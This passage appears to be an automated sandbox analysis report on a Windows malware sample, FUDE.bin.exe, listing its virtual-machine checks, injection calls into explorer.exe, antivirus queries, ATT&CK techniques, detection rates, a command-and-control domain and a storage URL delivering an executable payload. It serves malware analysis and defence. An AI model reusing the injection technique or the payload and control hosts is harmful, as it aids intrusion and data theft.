            Source: file.exe, 00000002.00000002.4141829614.0000000001172000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
            Source: explorer.exe, 00000003.00000002.4148727360.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
            Source: FUDE.bin.exe, 00000000.00000002.1706185154.00000000013E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
            Source: explorer.exe, 00000003.00000002.4147798516.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: explorer.exe, 00000003.00000000.1695776018.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1695776018.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000003.00000002.4148727360.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000003.00000002.4145556049.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
            Source: explorer.exe, 00000003.00000002.4141791366.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000003.00000002.4147798516.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: explorer.exe, 00000003.00000002.4141791366.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: FUDE.bin.exe, Program.cs.Net Code: InjectFileIntoExplorer contains injection code
            Source: FUDE.bin.exe, Program.csReference to suspicious API methods: OpenProcess(2035711u, bInheritHandle: false, process.Id)
            Source: FUDE.bin.exe, Program.csReference to suspicious API methods: VirtualAllocEx(intPtr, IntPtr.Zero, (uint)bytes.Length, 12288u, 64u)
            Source: FUDE.bin.exe, Program.csReference to suspicious API methods: WriteProcessMemory(intPtr, intPtr2, bytes, (uint)bytes.Length, out var _)
            Source: FUDE.bin.exe, Program.csReference to suspicious API methods: GetProcAddress(moduleHandle, "CreateProcessW")
            Source: FUDE.bin.exe, Program.csReference to suspicious API methods: CreateRemoteThread(intPtr, IntPtr.Zero, 0u, procAddress, intPtr2, 0u, out lpThreadId)
            Source: file.exe.0.dr, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
            Source: C:\Users\user\Desktop\FUDE.bin.exeMemory allocated: C:\Windows\explorer.exe base: 3460000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeMemory written: PID: 2580 base: 3460000 value: 43Jump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeMemory written: C:\Windows\explorer.exe base: 3460000Jump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
            Source: explorer.exe, 00000003.00000000.1693870573.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1691586500.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1695776018.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.1691586500.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4142270628.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.1691212547.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141791366.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: explorer.exe, 00000003.00000000.1691586500.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4142270628.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000003.00000000.1691586500.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4142270628.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\FUDE.bin.exeQueries volume information: C:\Users\user\Desktop\FUDE.bin.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\file.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.0.file.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000000.1687708875.0000000000C42000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4142868111.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6972, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.0.file.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000000.1687708875.0000000000C42000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4142868111.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6972, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPED
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            412
            Process Injection
            1
            Masquerading
            OS Credential Dumping211
            Security Software Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory2
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive11
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeylogging112
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Software Packing
            Cached Domain Credentials13
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            FUDE.bin.exe18%VirustotalBrowse
            FUDE.bin.exe16%ReversingLabs
            FUDE.bin.exe100%AviraHEUR/AGEN.1358000
            FUDE.bin.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\file.exe100%AviraHEUR/AGEN.1305769
            C:\Users\user\AppData\Local\Temp\file.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\file.exe66%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            ads-jeremy.gl.at.ply.gg2%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://aka.ms/odirmr0%URL Reputationsafe
            https://aka.ms/odirmr0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%URL Reputationsafe
            https://powerpoint.office.comcember0%URL Reputationsafe
            https://powerpoint.office.comcember0%URL Reputationsafe
            https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-0%URL Reputationsafe
            https://excel.office.com0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe
            https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%URL Reputationsafe
            https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%URL Reputationsafe
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%URL Reputationsafe
            https://api.msn.com/q0%URL Reputationsafe
            https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-10%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
            https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A0%URL Reputationsafe
            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
            https://wns.windows.com/L0%URL Reputationsafe
            https://word.office.com0%URL Reputationsafe
            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
            https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent0%URL Reputationsafe
            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%URL Reputationsafe
            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%URL Reputationsafe
            https://aka.ms/Vh5j3k0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
            https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
            https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
            https://android.notify.windows.com/iOS0%URL Reputationsafe
            https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar0%URL Reputationsafe
            https://api.msn.com/0%URL Reputationsafe
            https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d0%URL Reputationsafe
            https://outlook.com_0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
            https://www.msn.com:443/en-us/feed0%URL Reputationsafe
            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%URL Reputationsafe
            https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of0%URL Reputationsafe
            http://s355vlx.storage.yandex.netd0%Avira URL Cloudsafe
            http://s355vlx.storage.yandex.net0%Avira URL Cloudsafe
            http://s355vlx.storage.yandex.net/rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be821e96b/66af8c32/AiwRdOOLiCrkwWShBhcRfBv66wdV_gWAlrktMbpOi7EPEHHuUDDgYy0_mv6esa-xg8RAhDBKCZL5h5sBq8Fb4w==?uid=0&filename=xcweb.exe&disposition=attachment&hash=HqgB2usPumPowCfFVqsCvy%2BR6Xnj%2BKgdMRlicFj1Jpw3VwaT47lG5dSCsMa3WnKmq/J6bpmRyOJonT3VoXnDag%3D%3D&limit=0&content_type=application%2Fx-dosexec&owner_uid=1425898286&fsize=33280&hid=2a700e71c2af2dc9615f16632c865451&media_type=executable&tknv=v2&ts=61edc24f5f080&s=f9c98e348785dccf7ddd4c1ac9efee6f2007fa91d8871ab0e4447b34248bfafb&pb=U2FsdGVkX1-5hsS7H2xAWpYocjMKREeX7oisuiFsZmtN3VlwKpxAkVWcvjdgtCOv1pWfi3zxnvfJtU6seQHLVUNQupWbg-u7Fz1wzLTPUO80%Avira URL Cloudsafe
            ads-jeremy.gl.at.ply.gg100%Avira URL Cloudmalware
            127.0.0.10%Avira URL Cloudsafe
            http://s355vlx.storage.yandex.net/rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be8210%Avira URL Cloudsafe
            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%Avira URL Cloudsafe
            127.0.0.10%VirustotalBrowse
            http://s355vlx.storage.yandex.net/rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be821e96b/66af8c32/AiwRdOOLiCrkwWShBhcRfBv66wdV_gWAlrktMbpOi7EPEHHuUDDgYy0_mv6esa-xg8RAhDBKCZL5h5sBq8Fb4w==?uid=0&filename=xcweb.exe&disposition=attachment&hash=HqgB2usPumPowCfFVqsCvy%2BR6Xnj%2BKgdMRlicFj1Jpw3VwaT47lG5dSCsMa3WnKmq/J6bpmRyOJonT3VoXnDag%3D%3D&limit=0&content_type=application%2Fx-dosexec&owner_uid=1425898286&fsize=33280&hid=2a700e71c2af2dc9615f16632c865451&media_type=executable&tknv=v2&ts=61edc24f5f080&s=f9c98e348785dccf7ddd4c1ac9efee6f2007fa91d8871ab0e4447b34248bfafb&pb=U2FsdGVkX1-5hsS7H2xAWpYocjMKREeX7oisuiFsZmtN3VlwKpxAkVWcvjdgtCOv1pWfi3zxnvfJtU6seQHLVUNQupWbg-u7Fz1wzLTPUO80%VirustotalBrowse
            ads-jeremy.gl.at.ply.gg2%VirustotalBrowse
            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            ads-jeremy.gl.at.ply.gg
            147.185.221.17
            truetrueunknown
            s355vlx.storage.yandex.net
            5.45.238.155
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              ads-jeremy.gl.at.ply.ggtrue
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://s355vlx.storage.yandex.net/rdisk/a2dca1babaa95e6be61bb81085ada861493d1dda8cfacd1d9055fd0be821e96b/66af8c32/AiwRdOOLiCrkwWShBhcRfBv66wdV_gWAlrktMbpOi7EPEHHuUDDgYy0_mv6esa-xg8RAhDBKCZL5h5sBq8Fb4w==?uid=0&filename=xcweb.exe&disposition=attachment&hash=HqgB2usPumPowCfFVqsCvy%2BR6Xnj%2BKgdMRlicFj1Jpw3VwaT47lG5dSCsMa3WnKmq/J6bpmRyOJonT3VoXnDag%3D%3D&limit=0&content_type=application%2Fx-dosexec&owner_uid=1425898286&fsize=33280&hid=2a700e71c2af2dc9615f16632c865451&media_type=executable&tknv=v2&ts=61edc24f5f080&s=f9c98e348785dccf7ddd4c1ac9efee6f2007fa91d8871ab0e4447b34248bfafb&pb=U2FsdGVkX1-5hsS7H2xAWpYocjMKREeX7oisuiFsZmtN3VlwKpxAkVWcvjdgtCOv1pWfi3zxnvfJtU6seQHLVUNQupWbg-u7Fz1wzLTPUO8false
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              127.0.0.1true
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://aka.ms/odirmrexplorer.exe, 00000003.00000000.1694064441.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4145556049.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3111426241.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://powerpoint.office.comcemberexplorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.1695776018.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://s355vlx.storage.yandex.netFUDE.bin.exe, 00000000.00000002.1707448372.000000000339E000.00000004.00000800.00020000.00000000.sdmp, FUDE.bin.exe, 00000000.00000002.1707448372.0000000003394000.00000004.00000800.00020000.00000000.sdmp, FUDE.bin.exe, 00000000.00000002.1707448372.00000000033A6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://excel.office.comexplorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.microexplorer.exe, 00000003.00000000.1694888543.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1695304954.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4148927014.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com/qexplorer.exe, 00000003.00000000.1695776018.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4147798516.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://s355vlx.storage.yandex.netdFUDE.bin.exe, 00000000.00000002.1707448372.00000000033A6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.1698574900.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4152476174.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFUDE.bin.exe, 00000000.00000002.1707448372.0000000003394000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4142868111.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://wns.windows.com/Lexplorer.exe, 00000003.00000002.4151464173.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://word.office.comexplorer.exe, 00000003.00000002.4151464173.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1698574900.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000002.4144685534.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
